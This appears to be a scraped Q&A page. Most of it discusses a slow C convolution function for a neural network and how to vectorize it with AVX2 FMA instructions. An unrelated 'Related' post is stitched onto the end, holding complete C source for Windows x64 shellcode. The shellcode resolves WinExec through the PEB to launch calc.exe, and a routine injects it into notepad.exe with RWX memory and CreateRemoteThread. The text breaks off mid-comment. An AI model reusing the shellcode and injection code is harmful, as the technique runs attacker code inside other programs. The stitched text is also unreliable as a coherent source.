I have implemented a Convolutional Neural Network in C and have been studying what parts of it have the longest latency.
Based on my research, the massive amount of matrix multiplication required by CNNs makes running them on CPUs and even GPUs very inefficient. However, when I actually profiled my code (on an unoptimized build) I found out that something other than the multiplication itself was the bottleneck of the implementation.
After turning on optimization (-O3 -march=native -ffast-math, gcc cross compiler), the Gprof result was the following:
Clearly, the convolution2D function takes the largest amount of time to run, followed by the batch normalization and depthwise convolution functions.
The convolution function in question looks like this:
void convolution2D(int isize, // width/height of input
int osize, // width/height of output
int ksize, // width/height of kernel
int stride, // shift between input pixels, between consecutive outputs
int pad, // offset between (0,0) pixels between input and output
int idepth, int odepth, // number of input and output channels
float idata[isize][isize][idepth],
float odata[osize][osize][odepth],
float kdata[odepth][ksize][ksize][idepth])
{
// Direct 2D convolution with implicit zero padding: for each output
// pixel (oy,ox) and output channel od, sum kernel * input over the
// ksize x ksize window and all input channels.
// iterate over the output
for (int oy = 0; oy < osize; ++oy) {
for (int ox = 0; ox < osize; ++ox) {
for (int od = 0; od < odepth; ++od) {
// Accumulate in a local variable instead of read-modify-writing
// odata[oy][ox][od] in the innermost loop. The original kept the
// accumulator in memory (the vmovss store to [r8] inside the hot
// loop of the disassembly), forcing a store/reload every multiply
// and blocking vectorization of the reduction. A single final
// store also (re)initializes the output on every call, so repeated
// invocations cannot accumulate stale values.
float sum = 0.0f;
for (int ky = 0; ky < ksize; ++ky) {
for (int kx = 0; kx < ksize; ++kx) {
// map position in output and kernel to the input
int iy = stride * oy + ky - pad;
int ix = stride * ox + kx - pad;
// use only valid inputs (out-of-range taps act as zeros)
if (iy >= 0 && iy < isize && ix >= 0 && ix < isize)
for (int id = 0; id < idepth; ++id)
sum += kdata[od][ky][kx][id] * idata[iy][ix][id];
}}
odata[oy][ox][od] = sum;
}}}
}
This is a design based on my previous question and most of the processing time should fall on the convolution itself: odata[oy][ox][od] += kdata[od][ky][kx][id] * idata[iy][ix][id];.
Using objdump -drwC -Mintel to take a look at the assembly code returns me the following:
0000000000007880 <convolution2D>:
7880: f3 0f 1e fa endbr64
7884: 55 push rbp
7885: 48 89 e5 mov rbp,rsp
7888: 41 57 push r15
788a: 41 56 push r14
788c: 41 55 push r13
788e: 41 54 push r12
7890: 53 push rbx
7891: 48 81 ec b0 00 00 00 sub rsp,0xb0
7898: ff 15 4a a7 00 00 call QWORD PTR [rip+0xa74a] # 11fe8 <mcount#GLIBC_2.2.5>
789e: 89 d3 mov ebx,edx
78a0: 89 55 a8 mov DWORD PTR [rbp-0x58],edx
78a3: 89 8d 74 ff ff ff mov DWORD PTR [rbp-0x8c],ecx
78a9: 49 63 d1 movsxd rdx,r9d
78ac: 48 63 cf movsxd rcx,edi
78af: 41 89 f2 mov r10d,esi
78b2: 89 b5 38 ff ff ff mov DWORD PTR [rbp-0xc8],esi
78b8: 49 63 c0 movsxd rax,r8d
78bb: 48 0f af ca imul rcx,rdx
78bf: 48 63 75 10 movsxd rsi,DWORD PTR [rbp+0x10]
78c3: 49 89 d6 mov r14,rdx
78c6: 4c 8d 24 95 00 00 00 00 lea r12,[rdx*4+0x0]
78ce: 41 89 fd mov r13d,edi
78d1: 49 89 cb mov r11,rcx
78d4: 48 89 8d 60 ff ff ff mov QWORD PTR [rbp-0xa0],rcx
78db: 49 63 ca movsxd rcx,r10d
78de: 4c 8d 0c b5 00 00 00 00 lea r9,[rsi*4+0x0]
78e6: 49 89 f0 mov r8,rsi
78e9: 48 0f af f1 imul rsi,rcx
78ed: 48 63 cb movsxd rcx,ebx
78f0: 4c 89 8d 48 ff ff ff mov QWORD PTR [rbp-0xb8],r9
78f7: 48 0f af d1 imul rdx,rcx
78fb: 48 8d 3c 95 00 00 00 00 lea rdi,[rdx*4+0x0]
7903: 45 85 d2 test r10d,r10d
7906: 0f 8e 73 02 00 00 jle 7b7f <convolution2D+0x2ff>
790c: 48 c1 ef 02 shr rdi,0x2
7910: 49 c1 e9 02 shr r9,0x2
7914: 48 89 7d c8 mov QWORD PTR [rbp-0x38],rdi
7918: 4c 89 e7 mov rdi,r12
791b: 4c 89 8d 58 ff ff ff mov QWORD PTR [rbp-0xa8],r9
7922: 48 c1 ef 02 shr rdi,0x2
7926: 48 89 bd 50 ff ff ff mov QWORD PTR [rbp-0xb0],rdi
792d: 45 85 c0 test r8d,r8d
7930: 0f 8e 49 02 00 00 jle 7b7f <convolution2D+0x2ff>
7936: 48 c1 e6 02 shl rsi,0x2
793a: 48 0f af d1 imul rdx,rcx
793e: 29 c3 sub ebx,eax
7940: 89 c7 mov edi,eax
7942: 48 89 b5 30 ff ff ff mov QWORD PTR [rbp-0xd0],rsi
7949: 48 8b 75 20 mov rsi,QWORD PTR [rbp+0x20]
794d: 48 89 85 68 ff ff ff mov QWORD PTR [rbp-0x98],rax
7954: f7 df neg edi
7956: 45 8d 7e ff lea r15d,[r14-0x1]
795a: 89 9d 70 ff ff ff mov DWORD PTR [rbp-0x90],ebx
7960: 89 bd 3c ff ff ff mov DWORD PTR [rbp-0xc4],edi
7966: 48 8d 0c 95 00 00 00 00 lea rcx,[rdx*4+0x0]
796e: 89 7d ac mov DWORD PTR [rbp-0x54],edi
7971: 89 5d d4 mov DWORD PTR [rbp-0x2c],ebx
7974: 48 89 4d 98 mov QWORD PTR [rbp-0x68],rcx
7978: 4a 8d 0c 9d 00 00 00 00 lea rcx,[r11*4+0x0]
7980: c7 45 80 00 00 00 00 mov DWORD PTR [rbp-0x80],0x0
7987: 48 89 75 88 mov QWORD PTR [rbp-0x78],rsi
798b: 41 8d 70 ff lea esi,[r8-0x1]
798f: 48 89 4d c0 mov QWORD PTR [rbp-0x40],rcx
7993: 48 8d 04 b5 04 00 00 00 lea rax,[rsi*4+0x4]
799b: c7 45 90 00 00 00 00 mov DWORD PTR [rbp-0x70],0x0
79a2: 48 89 85 28 ff ff ff mov QWORD PTR [rbp-0xd8],rax
79a9: 44 89 f0 mov eax,r14d
79ac: 45 89 ee mov r14d,r13d
79af: 41 89 c5 mov r13d,eax
79b2: 48 8b 85 28 ff ff ff mov rax,QWORD PTR [rbp-0xd8]
79b9: 48 03 45 88 add rax,QWORD PTR [rbp-0x78]
79bd: 48 c7 85 78 ff ff ff 00 00 00 00 mov QWORD PTR [rbp-0x88],0x0
79c8: c7 45 84 00 00 00 00 mov DWORD PTR [rbp-0x7c],0x0
79cf: c7 45 94 00 00 00 00 mov DWORD PTR [rbp-0x6c],0x0
79d6: 44 8b 95 70 ff ff ff mov r10d,DWORD PTR [rbp-0x90]
79dd: 48 89 45 b0 mov QWORD PTR [rbp-0x50],rax
79e1: 48 63 45 80 movsxd rax,DWORD PTR [rbp-0x80]
79e5: 48 2b 85 68 ff ff ff sub rax,QWORD PTR [rbp-0x98]
79ec: 48 0f af 85 60 ff ff ff imul rax,QWORD PTR [rbp-0xa0]
79f4: 48 89 85 40 ff ff ff mov QWORD PTR [rbp-0xc0],rax
79fb: 8b 85 3c ff ff ff mov eax,DWORD PTR [rbp-0xc4]
7a01: 89 45 d0 mov DWORD PTR [rbp-0x30],eax
7a04: 48 8b 45 88 mov rax,QWORD PTR [rbp-0x78]
7a08: 48 8b 9d 78 ff ff ff mov rbx,QWORD PTR [rbp-0x88]
7a0f: 4c 8d 04 98 lea r8,[rax+rbx*4]
7a13: 48 8b 45 28 mov rax,QWORD PTR [rbp+0x28]
7a17: 48 8b 5d 18 mov rbx,QWORD PTR [rbp+0x18]
7a1b: 48 89 45 b8 mov QWORD PTR [rbp-0x48],rax
7a1f: 48 63 45 84 movsxd rax,DWORD PTR [rbp-0x7c]
7a23: 48 2b 85 68 ff ff ff sub rax,QWORD PTR [rbp-0x98]
7a2a: 48 0f af 85 50 ff ff ff imul rax,QWORD PTR [rbp-0xb0]
7a32: 48 03 85 40 ff ff ff add rax,QWORD PTR [rbp-0xc0]
7a39: 48 8d 04 83 lea rax,[rbx+rax*4]
7a3d: 48 89 45 a0 mov QWORD PTR [rbp-0x60],rax
7a41: 66 66 2e 0f 1f 84 00 00 00 00 00 data16 nop WORD PTR cs:[rax+rax*1+0x0]
7a4c: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
7a50: 8b 45 a8 mov eax,DWORD PTR [rbp-0x58]
7a53: 41 c7 00 00 00 00 00 mov DWORD PTR [r8],0x0
7a5a: 45 31 db xor r11d,r11d
7a5d: 48 8b 5d a0 mov rbx,QWORD PTR [rbp-0x60]
7a61: 44 8b 4d ac mov r9d,DWORD PTR [rbp-0x54]
7a65: 85 c0 test eax,eax
7a67: 0f 8e 98 00 00 00 jle 7b05 <convolution2D+0x285>
7a6d: 0f 1f 00 nop DWORD PTR [rax]
7a70: 45 85 c9 test r9d,r9d
7a73: 78 7b js 7af0 <convolution2D+0x270>
7a75: 45 39 ce cmp r14d,r9d
7a78: 7e 76 jle 7af0 <convolution2D+0x270>
7a7a: 48 8b 45 b8 mov rax,QWORD PTR [rbp-0x48]
7a7e: 8b 55 d0 mov edx,DWORD PTR [rbp-0x30]
7a81: 48 89 de mov rsi,rbx
7a84: 4a 8d 3c 98 lea rdi,[rax+r11*4]
7a88: eb 13 jmp 7a9d <convolution2D+0x21d>
7a8a: 66 0f 1f 44 00 00 nop WORD PTR [rax+rax*1+0x0]
7a90: ff c2 inc edx
7a92: 4c 01 e7 add rdi,r12
7a95: 4c 01 e6 add rsi,r12
7a98: 44 39 d2 cmp edx,r10d
7a9b: 74 53 je 7af0 <convolution2D+0x270>
7a9d: 85 d2 test edx,edx
7a9f: 78 ef js 7a90 <convolution2D+0x210>
7aa1: 41 39 d6 cmp r14d,edx
7aa4: 7e ea jle 7a90 <convolution2D+0x210>
7aa6: 45 85 ed test r13d,r13d
7aa9: 7e e5 jle 7a90 <convolution2D+0x210>
7aab: c4 c1 7a 10 08 vmovss xmm1,DWORD PTR [r8]
7ab0: 31 c0 xor eax,eax
7ab2: 66 66 2e 0f 1f 84 00 00 00 00 00 data16 nop WORD PTR cs:[rax+rax*1+0x0]
7abd: 0f 1f 00 nop DWORD PTR [rax]
7ac0: c5 fa 10 04 87 vmovss xmm0,DWORD PTR [rdi+rax*4]
7ac5: 48 89 c1 mov rcx,rax
7ac8: c5 fa 59 04 86 vmulss xmm0,xmm0,DWORD PTR [rsi+rax*4]
7acd: 48 ff c0 inc rax
7ad0: c5 f2 58 c8 vaddss xmm1,xmm1,xmm0
7ad4: c4 c1 7a 11 08 vmovss DWORD PTR [r8],xmm1
7ad9: 49 39 cf cmp r15,rcx
7adc: 75 e2 jne 7ac0 <convolution2D+0x240>
7ade: ff c2 inc edx
7ae0: 4c 01 e7 add rdi,r12
7ae3: 4c 01 e6 add rsi,r12
7ae6: 44 39 d2 cmp edx,r10d
7ae9: 75 b2 jne 7a9d <convolution2D+0x21d>
7aeb: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]
7af0: 4c 03 5d c8 add r11,QWORD PTR [rbp-0x38]
7af4: 48 03 5d c0 add rbx,QWORD PTR [rbp-0x40]
7af8: 41 ff c1 inc r9d
7afb: 44 3b 4d d4 cmp r9d,DWORD PTR [rbp-0x2c]
7aff: 0f 85 6b ff ff ff jne 7a70 <convolution2D+0x1f0>
7b05: 48 8b 5d 98 mov rbx,QWORD PTR [rbp-0x68]
7b09: 49 83 c0 04 add r8,0x4
7b0d: 48 01 5d b8 add QWORD PTR [rbp-0x48],rbx
7b11: 4c 3b 45 b0 cmp r8,QWORD PTR [rbp-0x50]
7b15: 0f 85 35 ff ff ff jne 7a50 <convolution2D+0x1d0>
7b1b: 8b 9d 74 ff ff ff mov ebx,DWORD PTR [rbp-0x8c]
7b21: 8b 45 94 mov eax,DWORD PTR [rbp-0x6c]
7b24: 48 8b 8d 48 ff ff ff mov rcx,QWORD PTR [rbp-0xb8]
7b2b: 01 5d d0 add DWORD PTR [rbp-0x30],ebx
7b2e: 48 01 4d b0 add QWORD PTR [rbp-0x50],rcx
7b32: 01 5d 84 add DWORD PTR [rbp-0x7c],ebx
7b35: 48 8b 8d 58 ff ff ff mov rcx,QWORD PTR [rbp-0xa8]
7b3c: 41 01 da add r10d,ebx
7b3f: 48 01 8d 78 ff ff ff add QWORD PTR [rbp-0x88],rcx
7b46: ff c0 inc eax
7b48: 39 85 38 ff ff ff cmp DWORD PTR [rbp-0xc8],eax
7b4e: 74 08 je 7b58 <convolution2D+0x2d8>
7b50: 89 45 94 mov DWORD PTR [rbp-0x6c],eax
7b53: e9 ac fe ff ff jmp 7a04 <convolution2D+0x184>
7b58: 8b 4d 90 mov ecx,DWORD PTR [rbp-0x70]
7b5b: 48 8b b5 30 ff ff ff mov rsi,QWORD PTR [rbp-0xd0]
7b62: 01 5d d4 add DWORD PTR [rbp-0x2c],ebx
7b65: 01 5d ac add DWORD PTR [rbp-0x54],ebx
7b68: 01 5d 80 add DWORD PTR [rbp-0x80],ebx
7b6b: 48 01 75 88 add QWORD PTR [rbp-0x78],rsi
7b6f: 8d 41 01 lea eax,[rcx+0x1]
7b72: 39 4d 94 cmp DWORD PTR [rbp-0x6c],ecx
7b75: 74 08 je 7b7f <convolution2D+0x2ff>
7b77: 89 45 90 mov DWORD PTR [rbp-0x70],eax
7b7a: e9 33 fe ff ff jmp 79b2 <convolution2D+0x132>
7b7f: 48 81 c4 b0 00 00 00 add rsp,0xb0
7b86: 5b pop rbx
7b87: 41 5c pop r12
7b89: 41 5d pop r13
7b8b: 41 5e pop r14
7b8d: 41 5f pop r15
7b8f: 5d pop rbp
7b90: c3 ret
7b91: 66 66 2e 0f 1f 84 00 00 00 00 00 data16 nop WORD PTR cs:[rax+rax*1+0x0]
7b9c: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
For reference, I'm using an AMD Ryzen 7 CPU which uses Zen2 architecture. Here is its list of instructions (page 101).
I suspect that the data here points to a memory issue instead of simply the multiplication being the cause of the bottleneck.
Question:
How can I improve this code so that it does not cause a memory bottleneck?
I'm guessing this is actually a problem particular to my code, perhaps something related to the multidimensional arrays I'm using. If I instead used one big single-dimensional array for each variable, would the latency decrease?
Relevant information:
There are two ways I declare the variables that are passed to this function. The first is as a global variable (usually in a struct), the second is as dynamic allocation:
float (*arr)[x][y] = calloc(z, sizeof *arr);
Perhaps the order in which I declare these matrices is not cache-friendly, but I am not sure how to re-order it.
Stride values for the previous function are always 1 or 2, usually 1.
Here is the output of valgrind --tool=cachegrind:
==430300== Cachegrind, a cache and branch-prediction profiler
==430300== Copyright (C) 2002-2017, and GNU GPL'd, by Nicholas Nethercote et al.
==430300== Using Valgrind-3.15.0 and LibVEX; rerun with -h for copyright info
==430300== Command: ./EmbeddedNet test 1
==430300== Parent PID: 170008
==430300==
--430300-- warning: L3 cache found, using its data for the LL simulation.
==430300==
==430300== I refs: 6,369,594,192
==430300== I1 misses: 4,271
==430300== LLi misses: 2,442
==430300== I1 miss rate: 0.00%
==430300== LLi miss rate: 0.00%
==430300==
==430300== D refs: 2,064,233,110 (1,359,003,131 rd + 705,229,979 wr)
==430300== D1 misses: 34,476,969 ( 19,010,839 rd + 15,466,130 wr)
==430300== LLd misses: 5,311,277 ( 1,603,955 rd + 3,707,322 wr)
==430300== D1 miss rate: 1.7% ( 1.4% + 2.2% )
==430300== LLd miss rate: 0.3% ( 0.1% + 0.5% )
==430300==
==430300== LL refs: 34,481,240 ( 19,015,110 rd + 15,466,130 wr)
==430300== LL misses: 5,313,719 ( 1,606,397 rd + 3,707,322 wr)
==430300== LL miss rate: 0.1% ( 0.0% + 0.5% )
Looking at the result of Cachegrind, it doesn't look like memory is your bottleneck. The NN has to be stored in memory anyway, and if it were so large that your program suffered many L1 cache misses, it would be worth trying to minimize them — but a 1.7% L1 (data) miss rate is not a problem.
So you're trying to make this run fast anyway. Looking at your code, what's happening at the most inner loop is very simple (load-> multiply -> add -> store), and it doesn't have any side effect other than the final store. This kind of code is easily parallelizable, for example, by multithreading or vectorizing. I think you'll know how to make this run in multiple threads seeing that you can write code with some complexity, and you asked in comments how to manually vectorize the code.
I will explain that part, but one thing to bear in mind is that once you choose to manually vectorize the code, it will often be tied to certain CPU architectures. Let's not consider non-AMD64 compatible CPUs like ARM. Still, you have the option of MMX, SSE, AVX, and AVX512 to choose as an extension for vectorized computation, and each extension has multiple versions. If you want maximum portability, SSE2 is a reasonable choice. SSE2 appeared with Pentium 4, and it supports 128-bit vectors. For this post I'll use AVX2, which supports 128-bit and 256-bit vectors. It runs fine on your CPU, and has reasonable portability these days, supported from Haswell (2013) and Excavator (2015).
The pattern you're using in the inner loop is called FMA (fused multiply and add). AVX2 has an instruction for this. Have a look at this function and the compiled output.
/* Scalar multiply-add pattern: a * b + c.
 * Deliberately kept as a single expression so the compiler may contract
 * it into one fused vfmadd132ss instruction, as the listing below shows
 * (contraction is only permitted within one expression). */
float fma_scl(float a, float b, float c) {
return a * b + c;
}
fma_scl:
vfmadd132ss xmm0, xmm2, xmm1
ret
You can see the calculation done with a single instruction.
We'll define a 256-bit vector type using GCC's vector extension.
typedef float Vec __attribute__((vector_size(32), aligned(32)));
Here's a vectorized fma function.
/* 8-lane single-precision multiply-add on the 256-bit Vec type
 * (GCC vector extension): element-wise a * b + c. Kept as a single
 * expression so it contracts to one vfmadd132ps, as shown below. */
Vec fma_vec(Vec a, Vec b, Vec c) {
return a * b + c;
}
fma_vec:
vfmadd132ps ymm0, ymm2, ymm1
ret
The code above is semantically the same as the one below, but everything is done in a single instruction.
/* Plain-struct stand-in for the 256-bit vector type. */
typedef struct {
    float f[8];
} Vec_;

/* Scalar reference implementation of the 8-lane FMA: for every lane,
 * result = a * b + c. Semantically identical to fma_vec, which does
 * the same work in a single instruction. */
Vec_ fma_vec_(Vec_ a, Vec_ b, Vec_ c) {
    Vec_ out;
    unsigned lane = 0;
    while (lane < 8) {
        out.f[lane] = a.f[lane] * b.f[lane] + c.f[lane];
        ++lane;
    }
    return out;
}
I think you'll now get the idea of making code run faster by vectorization.
Here is a simple function that's somewhat similar to your inner loop.
/* In-place elementwise multiply-add: a[i] += b[i] * c[i] for i in [0, n).
 * The restrict qualifiers promise the three arrays never overlap, which
 * is what lets the compiler vectorize the loop freely. (The fma_scl
 * helper is inlined here; the arithmetic is identical.) */
void loopadd_scl(float *restrict a, float *restrict b, float *restrict c, unsigned n) {
    for (unsigned idx = 0; idx < n; ++idx) {
        a[idx] = b[idx] * c[idx] + a[idx];
    }
}
When you compile through GCC with -O3 -march=znver2, this is the output. It's huge. I'll explain below.
loopadd_scl:
test ecx, ecx
je .L25
lea eax, [rcx-1]
cmp eax, 6
jbe .L13
mov r8d, ecx
xor eax, eax
shr r8d, 3
sal r8, 5
.L9:
vmovups ymm1, YMMWORD PTR [rdi+rax]
vmovups ymm0, YMMWORD PTR [rdx+rax]
vfmadd132ps ymm0, ymm1, YMMWORD PTR [rsi+rax]
vmovups YMMWORD PTR [rdi+rax], ymm0
add rax, 32
cmp r8, rax
jne .L9
mov eax, ecx
and eax, -8
test cl, 7
je .L26
vzeroupper
.L8:
mov r9d, ecx
sub r9d, eax
lea r8d, [r9-1]
cmp r8d, 2
jbe .L11
mov r8d, eax
sal r8, 2
lea r10, [rdi+r8]
vmovups xmm0, XMMWORD PTR [rdx+r8]
vmovups xmm2, XMMWORD PTR [r10]
vfmadd132ps xmm0, xmm2, XMMWORD PTR [rsi+r8]
mov r8d, r9d
and r8d, -4
add eax, r8d
and r9d, 3
vmovups XMMWORD PTR [r10], xmm0
je .L25
.L11:
mov r8d, eax
sal r8, 2
lea r9, [rdi+r8]
vmovss xmm0, DWORD PTR [rdx+r8]
vmovss xmm3, DWORD PTR [r9]
vfmadd132ss xmm0, xmm3, DWORD PTR [rsi+r8]
lea r8d, [rax+1]
vmovss DWORD PTR [r9], xmm0
cmp r8d, ecx
jnb .L25
sal r8, 2
add eax, 2
lea r9, [rdi+r8]
vmovss xmm0, DWORD PTR [rsi+r8]
vmovss xmm4, DWORD PTR [r9]
vfmadd132ss xmm0, xmm4, DWORD PTR [rdx+r8]
vmovss DWORD PTR [r9], xmm0
cmp eax, ecx
jnb .L25
sal rax, 2
add rdi, rax
vmovss xmm0, DWORD PTR [rdx+rax]
vmovss xmm5, DWORD PTR [rdi]
vfmadd132ss xmm0, xmm5, DWORD PTR [rsi+rax]
vmovss DWORD PTR [rdi], xmm0
.L25:
ret
.L26:
vzeroupper
ret
.L13:
xor eax, eax
jmp .L8
Basically GCC doesn't know anything about n, so it's splitting the loop to 3 cases: n / 8 > 1, n / 4 > 1, n < 4. It first deals with the n / 8 > 1 part using 256-bit ymm registers. Then, it deals with n / 4 > 1 with 128-bit xmm registers. Finally, it deals with n < 4 with scalar ss instructions.
You can avoid this mess if you know n is a multiple of 8. I got a bit lazy now, so have a look at the code and the compiler output below and compare it with the above. I think you're smart enough to get the idea.
/* Vectorized variant of loopadd_scl: one iteration handles 8 floats.
 * n is the total float count and is assumed to be a multiple of 8, so
 * the compiler emits only the clean 256-bit loop (no scalar tail). */
void loopadd_vec(Vec *restrict a, Vec *restrict b, Vec *restrict c, unsigned n) {
    unsigned vec_count = n / 8;
    for (unsigned i = 0; i < vec_count; ++i) {
        a[i] = fma_vec(b[i], c[i], a[i]);
    }
}
loopadd_vec:
shr ecx, 3
je .L34
mov ecx, ecx
xor eax, eax
sal rcx, 5
.L29:
vmovaps ymm1, YMMWORD PTR [rdi+rax]
vmovaps ymm0, YMMWORD PTR [rdx+rax]
vfmadd132ps ymm0, ymm1, YMMWORD PTR [rsi+rax]
vmovaps YMMWORD PTR [rdi+rax], ymm0
add rax, 32
cmp rcx, rax
jne .L29
vzeroupper
.L34:
ret
}
Related
For fun, I'm trying to rewrite this NASM Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) using Windows MSVC x86-64 as shown here:
// Windows x86-64 - Dynamic WinExec Calc.exe Shellcode 479 bytes.
#include <Windows.h>
#include <Winternl.h>
#include <stdio.h>
#include <tchar.h>
#include <psapi.h>
// KERNEL32.DLL
#define NREK 0x004e00520045004b
// GetProcAddress
#define AcorPteG 0x41636f7250746547
// In assembly language, the ret instruction is short for "return."
// It is used to transfer control back to the calling function, typically at the end of a subroutine.
#define RET_INSTRUCTION 0xC3
// Self-contained, position-independent payload ("shellcode"):
//   1. read the PEB pointer from gs:[0x60],
//   2. walk InMemoryOrderModuleList to locate kernel32.dll,
//   3. parse its export directory to resolve GetProcAddress by name,
//   4. resolve WinExec through GetProcAddress and run "calc.exe".
// NOTE(review): the compiled bytes of this function are later extracted
// and injected verbatim; any source change alters the emitted shellcode.
void shell_code_start()
{
// Get the current process' PEB address
_PEB* peb = (_PEB*)__readgsqword(0x60);
// Get the address of the loaded module list
PLIST_ENTRY moduleList = &peb->Ldr->InMemoryOrderModuleList;
// Loop through the loaded modules
for (PLIST_ENTRY currentModule = moduleList->Flink; currentModule != moduleList; currentModule = currentModule->Flink)
{
// Match the first 8 bytes (four UTF-16 characters) of FullDllName
// against "KERN" -- NREK is "KERN" in little-endian UTF-16.
if (*(unsigned long long*)(((LDR_DATA_TABLE_ENTRY*)currentModule)->FullDllName.Buffer) == NREK)
{
// Get the LDR_DATA_TABLE_ENTRY for the current module
PLDR_DATA_TABLE_ENTRY pLdrEntry = CONTAINING_RECORD(currentModule, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
// Get the base address of kernel32.dll
HMODULE kernel32 = (HMODULE)pLdrEntry->DllBase;
// Get the DOS header of kernel32.dll
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)kernel32;
// Get the NT headers of kernel32.dll
PIMAGE_NT_HEADERS64 pNtHeaders = (PIMAGE_NT_HEADERS64)((BYTE*)pDosHeader + pDosHeader->e_lfanew);
// Get the export directory of kernel32.dll
PIMAGE_EXPORT_DIRECTORY pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)kernel32 + pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
// Get the array of function addresses of kernel32.dll
DWORD* pAddressOfFunctions = (DWORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfFunctions);
// Get the array of name addresses of kernel32.dll
DWORD* pAddressOfNames = (DWORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfNames);
// Get the array of ordinal numbers of kernel32.dll
WORD* pAddressOfNameOrdinals = (WORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfNameOrdinals);
// Loop through the names
for (DWORD i = 0; i < pExportDirectory->NumberOfNames; i++)
{
// Compare the first 8 bytes of the export name to "GetProcA"
// (AcorPteG is "GetProcA" in little-endian byte order); only the
// prefix is checked, which is sufficient in practice for kernel32.
if (*(unsigned long long*)((BYTE*)kernel32 + pAddressOfNames[i]) == AcorPteG)
{
// Compare the name of the current function to "GetProcAddress"
// If it matches, get the address of the function by using the ordinal number
FARPROC getProcAddress = (FARPROC)((BYTE*)kernel32 + pAddressOfFunctions[pAddressOfNameOrdinals[i]]);
// Use GetProcAddress to find the address of WinExec
// (strings are built char-by-char on the stack so the payload has
// no data-section references and stays position-independent)
char winexec[] = { 'W','i','n','E','x','e','c',0 };
FARPROC winExec = ((FARPROC(WINAPI*)(HINSTANCE, LPCSTR))(getProcAddress))(kernel32, winexec);
// Use WinExec to launch calc.exe
char calc[] = { 'c','a','l','c','.','e','x','e',0 };
((FARPROC(WINAPI*)(LPCSTR, UINT))(winExec))(calc, SW_SHOW);
break;
}
}
break;
}
}
}
/* Dump `length` bytes of shellcode as a C string literal, 16 bytes per
 * line. NUL bytes are wrapped in ANSI red escape codes so they stand
 * out (NULs truncate string-delivered shellcode). Output is identical
 * to the original implementation, byte for byte. */
void print_shellcode(unsigned char* shellcode, int length)
{
    printf("unsigned char shellcode[%d] = \n", length);
    for (int i = 0; i < length; i++)
    {
        if (i % 16 == 0)
        {
            printf("\"");
        }
        const char *fmt = (shellcode[i] == 0x00)
            ? "\x1B[31m\\x%02x\033[0m"  /* highlight NUL bytes in red */
            : "\\x%02x";
        printf(fmt, shellcode[i]);
        if ((i + 1) % 16 == 0)
        {
            printf("\"\n");
        }
    }
    printf("\";\n");
}
/*
 * Scan all running processes and return the PID of the first one whose
 * image file name contains "notepad.exe", or 0 if none is found (or if
 * EnumProcesses fails).
 */
DWORD GetNotepadPID()
{
    DWORD dwPID = 0;
    DWORD dwProcesses[1024], cbNeeded;
    if (EnumProcesses(dwProcesses, sizeof(dwProcesses), &cbNeeded))
    {
        for (DWORD i = 0; i < cbNeeded / sizeof(DWORD); i++)
        {
            if (dwProcesses[i] != 0)
            {
                HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwProcesses[i]);
                if (hProcess)
                {
                    TCHAR szProcessName[MAX_PATH] = _T("<unknown>");
                    if (GetProcessImageFileName(hProcess, szProcessName, sizeof(szProcessName) / sizeof(TCHAR)))
                    {
                        _tcslwr(szProcessName);
                        if (_tcsstr(szProcessName, _T("notepad.exe")) != 0)
                        {
                            dwPID = dwProcesses[i];
                        }
                    }
                    // BUG FIX: the original broke out of the loop on a match
                    // *before* this CloseHandle, leaking the handle of the
                    // matched process. Close unconditionally, then stop.
                    CloseHandle(hProcess);
                    if (dwPID != 0)
                    {
                        break;
                    }
                }
            }
        }
    }
    return dwPID; /* unused `dwSize` local removed */
}
/*
 * Copy `shellcode` (length bytes) into the first running notepad.exe
 * process and execute it on a remote thread, waiting for completion.
 * BUG FIX: the original never checked OpenProcess / VirtualAllocEx /
 * CreateRemoteThread results, so with no notepad running it passed NULL
 * handles to every subsequent call. Each failure now cleans up whatever
 * was already acquired and returns.
 */
void InjectShellcodeIntoNotepad(unsigned char* shellcode, int length)
{
    // Get the handle of the notepad.exe process (GetNotepadPID() returns
    // 0 when none is found, which makes OpenProcess fail with NULL).
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetNotepadPID());
    if (hProcess == NULL)
    {
        return;
    }
    // Allocate RWX memory for the shellcode in the notepad.exe process
    LPVOID shellcodeAddr = VirtualAllocEx(hProcess, NULL, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (shellcodeAddr == NULL)
    {
        CloseHandle(hProcess);
        return;
    }
    // Write the shellcode to the allocated memory in the notepad.exe process
    if (WriteProcessMemory(hProcess, shellcodeAddr, shellcode, length, NULL))
    {
        // Create a remote thread in the notepad.exe process to execute the shellcode
        HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)shellcodeAddr, NULL, 0, NULL);
        if (hThread)
        {
            // Wait for the remote thread to complete
            WaitForSingleObject(hThread, INFINITE);
            CloseHandle(hThread);
        }
    }
    // Clean up
    VirtualFreeEx(hProcess, shellcodeAddr, 0, MEM_RELEASE);
    CloseHandle(hProcess);
}
// Extract the body of shell_code_start as raw bytes, execute it locally,
// print it as a C string literal, then inject it into notepad.exe.
int main(int argc, char* argv[])
{
unsigned int rel32 = 0;
// E9 is the Intel 64 opcode for a jmp instruction with a rel32 offset.
// The next four bytes contain the 32-bit offset.
char jmp_rel32[] = { 0xE9, 0x00, 0x00, 0x00, 0x00 };
// Calculate the relative offset of the jump instruction
// NOTE(review): this assumes `shell_code_start` points at an
// incremental-linking jmp thunk (typical of MSVC debug builds); in a
// release build the symbol may point straight at the function body, in
// which case byte 1 is not a rel32 -- verify the build configuration.
rel32 = *(DWORD*)((char*)shell_code_start + 1);
// Get the actual starting address of the shellcode, by adding the relative offset to the address of the jump instruction
unsigned char *shell_code_start_real = (unsigned char *)shell_code_start + rel32 + sizeof(jmp_rel32);
// Get the actual end address of the shellcode by scanning the code looking for the ret instruction...
// NOTE(review): this stops at the FIRST 0xC3 byte. 0xC3 can also occur
// inside an instruction encoding or as immediate data, which would
